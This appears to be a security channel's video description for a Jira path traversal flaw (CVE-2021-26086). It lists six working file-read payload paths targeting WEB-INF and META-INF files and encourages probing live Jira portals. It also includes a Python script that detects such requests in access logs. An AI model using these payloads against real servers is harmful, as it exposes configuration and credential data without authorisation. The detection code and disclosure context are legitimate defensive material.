JIRA Path Traversal POC || CVE-2021-26086 || P3 || Information Disclosure || 2021|| Live site||

Published: 21 November 2021
on channel: AJAK Cybersecurity

Title: Path traversal leads to arbitrary file read with sensitive information disclosure (Jira)
CVE-2021-26086
Severity: Medium
Still, this is vulnerable in many VDP programs... so check for their Jira login portals and you can exploit it!

Payloads:

/s/123cfx/_/;/WEB-INF/web.xml
/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx//;/WEB-INF/decorators.xml
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
/s/cfx//;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx//;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
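
Detection side, as an added example that is not part of the original description: a log check that flags requests with the same shape as the payloads above (a path under /s/ with a ";" segment followed by WEB-INF/ or META-INF/). The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Shape shared by the payloads listed above: a path under /s/ that contains a
# ";" path-parameter segment immediately followed by WEB-INF/ or META-INF/.
PROTECTED = re.compile(r"^/s/.*/;[^/]*/(WEB-INF|META-INF)/", re.IGNORECASE)
# Request part of a combined-format access-log line (assumed log format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalise(target):
    """Drop the query string and percent-decode before matching."""
    path = target.split("?", 1)[0]
    for _ in range(2):  # decode twice so doubly encoded paths are compared too
        path = unquote(path)
    return path


def find_probes(lines):
    """Return (client, path, status) for every line matching the request shape."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        path = normalise(m.group("target"))
        if PROTECTED.search(path):
            hits.append((line.split(" ", 1)[0], path, int(m.group("status"))))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Nov/2021:10:00:01 +0000] "GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 4312',
    '198.51.100.7 - - [21/Nov/2021:10:00:02 +0000] "GET /s/cfx//;/WEB-INF/decorators.xml HTTP/1.1" 404 0',
    '203.0.113.9 - - [21/Nov/2021:10:00:05 +0000] "GET /s/abc123/_/download/batch/util.js HTTP/1.1" 200 9001',
    '203.0.113.9 - - [21/Nov/2021:10:00:09 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 18000',
]

if __name__ == "__main__":
    for client, path, status in find_probes(SAMPLE_LOG):
        # A 200 on one of these paths is the case to triage first.
        print(f"{client} status={status} path={path}")
```

A hit answered with status 200 is the one to investigate first, since it means the server returned a response for a path under WEB-INF or META-INF.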

Reference: https://packetstormsecurity.com/files...

#bugbounty #POC